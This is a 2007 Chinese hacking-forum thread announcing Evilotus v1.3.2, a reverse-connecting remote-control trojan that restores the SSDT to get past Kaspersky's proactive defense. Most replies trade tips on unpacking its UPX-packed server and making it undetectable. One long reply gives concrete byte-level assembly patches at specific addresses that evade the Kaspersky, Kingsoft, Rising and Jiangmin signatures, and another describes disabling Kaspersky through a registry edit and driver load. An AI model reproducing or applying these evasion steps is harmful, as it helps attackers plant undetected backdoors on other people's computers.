[原创]Evilotus v1.3.2(过卡巴主动防御)
文章作者:ybjh信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
Evilotus v1.3.2
一个反向连接的远程管理工具,英文界面,方便在非中文操作系统使用(本人英语水平有限,您将就着看了);具有SSDT恢复功能,可以过 全开的卡巴主动防御,但是可能会导致部分系统蓝屏,配置时可以不勾选,仅供学习。
本来是昨天下午发的,可是死活传不了附件(这里一到下午、晚上,网速变态的慢)。以后没多少时间玩了,有BUG也不用反映了。参考了好多前辈的成果,非常感谢。
[attach]5498[/attach] 具有SSDT恢复功能,可以过 全开的卡巴主动防御,但是可能会导致部分系统蓝屏
这个功能还是不选的好啊
很多机器都会重启。
还有脱了壳(还可以用)再修改做免杀什么的 (比如加其他壳)
好象就用不了 哇,偶看到的第一个有什么SSDT的RAT出现了,一定要测试一下 屏幕速度好象已经达到黑洞速度了
希望LZ共享生成无壳服务端版本 主动防御也就卡巴和那个什么有吧,瑞星金山等货色一概用生僻壳子处理。 [quote][b]引用第3楼[i]十四郎[/i]于[i]2007-02-23 13:32[/i]发表的[/b]:
屏幕速度好象已经达到黑洞速度了
希望LZ共享生成无壳服务端版本[/quote]
测试非常的不错
能生成无壳服务端就更加OK了! [quote][b]引用第7楼[i]gcdfly[/i]于[i]2007-03-07 10:00[/i]发表的[/b]:
测试非常的不错
能生成无壳服务端就更加OK了![/quote]
[color=blue]
自己做免杀也很简单的,配置时有个提示,那时候把目录下的setup.exe复制出来,UPX -D,处理免杀,保留一份,以后再配置的时候,出现提示时,只要把保留的免杀文件覆盖setup.exe,配置出来的就是免杀版
[/color] 这个不免杀
我的是XP的 不知道会不会蓝屏啊 哪天有兴趣就玩玩 完成端口技术,SSDT恢复,世界领先啊,楼主既然不想完了,开源吧 [s:264] [s:289][s:289];能过卡巴.过不了微点,一生成安装文件就被查杀出来了! 修复SSDT....
权力之争开始咯 BackDoor.Win32.Agent.alt
呵呵..似乎不行...未加密..被KB查到了.... [url]http://bbs.360safe.com/viewthread.php?tid=121375&extra=page%3D1[/url]
早被人上报到卡巴那里了,能不杀吗,主动防御跟文件查杀是两码事 服务端关闭事会自删除?
解压缩后运行两次都给删了,WHY?? 楼上很多人说要是生成无壳就好,其实脱掉几秒的时间啊。 有谁说说有没有比较简单的免杀方法的吗,我用了很多加密工具后程序试过,要么不能用要么不连接,难道只有改特征码吗 [quote]引用第21楼tianjishu596于2007-04-25 22:35发表的 :
楼上很多人说要是生成无壳就好,其实脱掉几秒的时间啊。[/quote]
你真的脱过没有?我试了种种脱壳机都脱不了。。。无奈。。。。
手动脱壳我又不会。。。。。郁闷 要怎么个脱法。。是脱生成的EXE 还是脱DLL。。?? [s:268] 死的多。改过后。很不稳定。照你说的,点一下。把SETUP删掉,把脱的放上面,最后确定,虽EXE免杀,但DLL也不行,再怎么改DLL,都是死的 [s:268] [s:268] 说实话,试过几个木马。。。
一步江湖兄的感觉用得舒服,操作上人性化,合理
补充:我用的不是现在帖的这个
可惜配置的服务端加了UPX的壳,再加上技术和RP问题。。至今未脱成
而且客户端加了更猛的ASProtect 2.1x SKE。。可惜脱了又修复不了
郁闷,就我的水平,做不了免杀啦。 ssdt恢复的功能可否单独做成一个文件使指定的文件绕过主动防御?
还有这个远控感觉不错就是在线主机似乎没有折叠列表功能
要是同时在线的多了不知道还能正常显示吗?? 这么多的牛人 谁共享个拖壳版出来/
生成出的EXE加了UPX我用PEID的插件拖不了,手动脱的又不知道为什么用不了/什么原因,,??
我用的是YBJH汉化版。谢谢 真不知道这个壳是怎么回事,查到是UPX,可是好像又不是,手脱之后不能运行,修复过输入表还是不能运行.
搞不懂了啊. [quote]引用第6楼ybjh于2007-03-07 15:02发表的 :
[color=blue]
自己做免杀也很简单的,配置时有个提示,那时候把目录下的setup.exe复制出来,UPX -D,处理免杀,保留一份,以后再配置的时候,出现提示时,只要把保留的免杀文件覆盖setup.exe,配置出来的就是免杀版
[/color][/quote]
虽然按照你的方法生成了个无壳的Setup,打开时虽然错误信息是没了,但是不知道是不是人品问题从来没上线过.
在这里的请求大大们如果你脱壳成功而且可以正常上线了请公布下脱此壳的方法.
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]
真的是这个壳吗????????? 呵呵,又被顶上来了
脱壳好像很简单,例如<暗组工具箱>里的UPX脱壳就可以一下脱掉
这个刚放出来的时候测试着免杀过
个人感觉吧,修改的兼容性当然没有鸽子这类的高
但是免杀也不算很难,我说的是特征码修改
至于加壳,它对壳的兼容性也是一个很大的确定吧
呵呵,因为总不可能人人都会特征码免杀,汇编免杀的
加壳是最直接的途径了
总体来说,我还算很看中这个马的
他的控制信息跟彩虹桥一样,都是加入尾部信息的
所以,在一定程度上弥补了他的免杀难度
更好的就是,你可以做出一个补丁,在生成的时候,跳出确定
你把自己处理免杀的服务端释放覆盖,然后确定,就OK啦
呵呵,偶没时间做那么多
最近忙电子的事情,有空了,再好好研究下这个马
悲哀的就是不会反汇编,如果会,俺还真想把鸽子改改,修改下写注册表的方式
呵呵,好啦,明天是情人节
祝大家情人节快乐
嘿嘿,说来悲哀...
俺说过一个人的情人节...
汗颜..... 我前一段写过一篇关于这个木马免杀的文章,可能现在已经不免杀了。
1.脱壳 UPX.exe就可以
2.改特征码过表面
卡吧:
004046C8: E8 FBCFFFFF CALL 004016C8
004046CD: 6A 01 PUSH 1
改为:
004046C8: 6A 01 PUSH 1
004046CA: E8 F9CFFFFF CALL 004016C8
3.导出DLL文件(名字忘了,rest开头的一个软件2007版的),脱壳,导入
································
成功过卡吧
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
4.
金山特征码:
0000499E_00000002
把以下代码下移:
00404998: E8 57FCFFFF CALL 004045F4
0040499D: E8 DAC2FFFF CALL 00400C7C
004049A2: 8BC0 MOV EAX,EAX
这样:
00404998: 90 NOP
00404999: 90 NOP
0040499A: 90 NOP
0040499B: 90 NOP
0040499C: 90 NOP
0040499D: E8 52FCFFFF CALL 004045F4
004049A2: E8 D5C2FFFF CALL 00400C7C
004049A7: 8BC0 MOV EAX,EAX
5
瑞星特征码:
0000498D_00000002
00404989: 8BEC MOV EBP,ESP
0040498B: 83C4 F0 ADD ESP,-10
0040498E: B8 C0544000 MOV EAX,4054C0
00404993: E8 98CBFFFF CALL 00401530
将0040498B和0040498E交换,过了表面
00404989: 8BEC MOV EBP,ESP
0040498B: B8 C0544000 MOV EAX,4054C0
00404990: 83C4 F0 ADD ESP,-10
00404993: E8 98CBFFFF CALL 00401530
但DLL文件被杀
DLL特征码:0000C871_00000002
JMP大法(成功)
004130CD: 8BEC MOV EBP,ESP
004130CF: EB 1B JMP SHORT 004130EC // 我跳
004130D1: 90 NOP
004130EC: 83C4 C4 ADD ESP,-3C
004130EF: EB E1 JMP SHORT 004130D2
//哈哈,虽然和金山一样查到了 rootkit.getdoor.h (x.tmp)但是上线了
6
不生成.TMP文件的方法
_______________________________________________________________________________________
OD中
将
00404327 74 0F je short 复件_m3.00404338
改为
jne short 复件_m3.00404338
________________________________________________________________________________
C32ASM中:
00403725: 85F6 TEST ESI,ESI
00403727: 74 0F JE SHORT 00403738
00403729: 6A 00 PUSH 0
7
江民特征码
1 0000468A_00000002
00404683: E8 58C8FFFF CALL 00400EE0
································
00404688: 8B45 F0 MOV EAX,[EBP-10]
0040468B: 50 PUSH EAX
0040468C: A1 306F4000 MOV EAX,[406F30] //前3句都跳
00404691: 8B00 MOV EAX,[EAX]
跳到这里
004049AF: 8B45 F0 MOV EAX,[EBP-10]
004049B2: 50 PUSH EAX
004049B3: A1 306F4000 MOV EAX,[406F30]
004049B8: E9 D4FCFFFF JMP 00404691
2 dll 0000C408_00000002
exe中
00412C66: E8 ED52FFFF jmp 004130F6 ///这句
00412C6B: 8B45 F8 MOV EAX,[EBP-8]
00412C6E: E8 C14FFFFF CALL 00407C34
00412C73: 50 PUSH EAX
跳到这里
004130F6: 0000 CALL 00407F58
004130F8: 0000 jmp 00412c6b
004130FA: 0000 ADD [EAX],AL
8
把.DLL和.exe加MASK壳 谢谢27楼的兄弟
我想你用的应该是Evilotus v1.3.2这个版本的吧。。问几个问题
我这里如果不导出DLL直接给服务端加花加壳都运行不了。
导出DDL不脱壳直接给它加花加壳也运行不了。
问下导出的那个DLL应该怎样脱壳。应该用脱壳机还是手脱?
还有用过1.2版应该知道服务端的UPX壳脱了运行不了(手脱还是脱壳机都试过),不知道各位是怎么脱掉它的。。 [quote]引用第28楼杀虫剂于2007-08-23 13:19发表的 :
谢谢27楼的兄弟
我想你用的应该是的吧。。问几个问题
我这里如果不导出DLL直接给服务端加花加壳都运行不了。
导出DDL不脱壳直接给它加花加壳也运行不了。
问下导出的那个DLL应该怎样脱壳。应该用脱壳机还是手脱?
.......[/quote]
是Evilotus v1.3.2这个版本,
你遇到的问题我也不懂,
导出的DLL用UPX.EXE脱就可以。其他版本的我也不会脱,我也是菜鸟啊,呵呵。 测试非常的不错
能生成无壳服务端就更加OK了! 恢复SSDT,byshell 1.09就是恢复SSDT的~
hiv改过注册表之后,用LoadDriver就能把卡巴给灭了
先Save,改过之后,再Restore回去
超级爽的办法 生成后脱EXE 再导出DLL 再脱DLL [quote]引用第26楼奈落于2007-08-19 17:28发表的 :
SSDT~这个是什么东西啊?本人比较菜~高手回答下[/quote]
[url]http://blog.csdn.net/titilima/archive/2007/07/05/1679846.aspx[/url]
从百度稍微找找就有很多。
由于不态度不认真 -10 分 既然顶上来了,就再发下贴让它再顶一下,个人感觉这个的免杀好难做。不知道谁有做过把方法说下。尽量说详细点,马上也中秋了本人给他发月饼,[s:269] 再谈下26 楼说的看明白的也就是卡吧和瑞星这段,其他的特征码完全找不到北了,我对卡吧和瑞星特征码处随便改了一点都运行错误,也不知道为什么你改的这么多还能正常上线??有些东西瞧得迷迷糊糊的,这个是不是LZ自己实践的结果还是从哪个东西粘贴过来的如果你有空看见了出来说下,。再说下这个脱壳吧,1.2的服务端壳某次看了一个教程叫”Overlay[附加数据]的处理“终于完全明白了。咳~~本人小菜很喜欢这个Evilotus,没办法看以前我发了这么多贴就知道了。大家也别说我菜什么的。菜就菜吧学总是要的。现在是不明白也许明白了的时候才发现自己的问题提得的确很菜。 [s:281] [s:257] SSDT恢复,只有碰上mcafee那种国外三流的杀软,才会蓝屏。
通常情况下,SSDT的成功率为99.99% 卡巴已经成为众矢之的了,反而觉得它很不安全,个人认为微点还是不错的,不过也找到过一些过微点主动防御的木马,还是最好配合360一起使用。 我只要对EVILOTUS进行一点修改就上不了线。。 脱了壳也不能正常运行。。 我有主控端的脱壳的 服务端脱不了
页:
[1]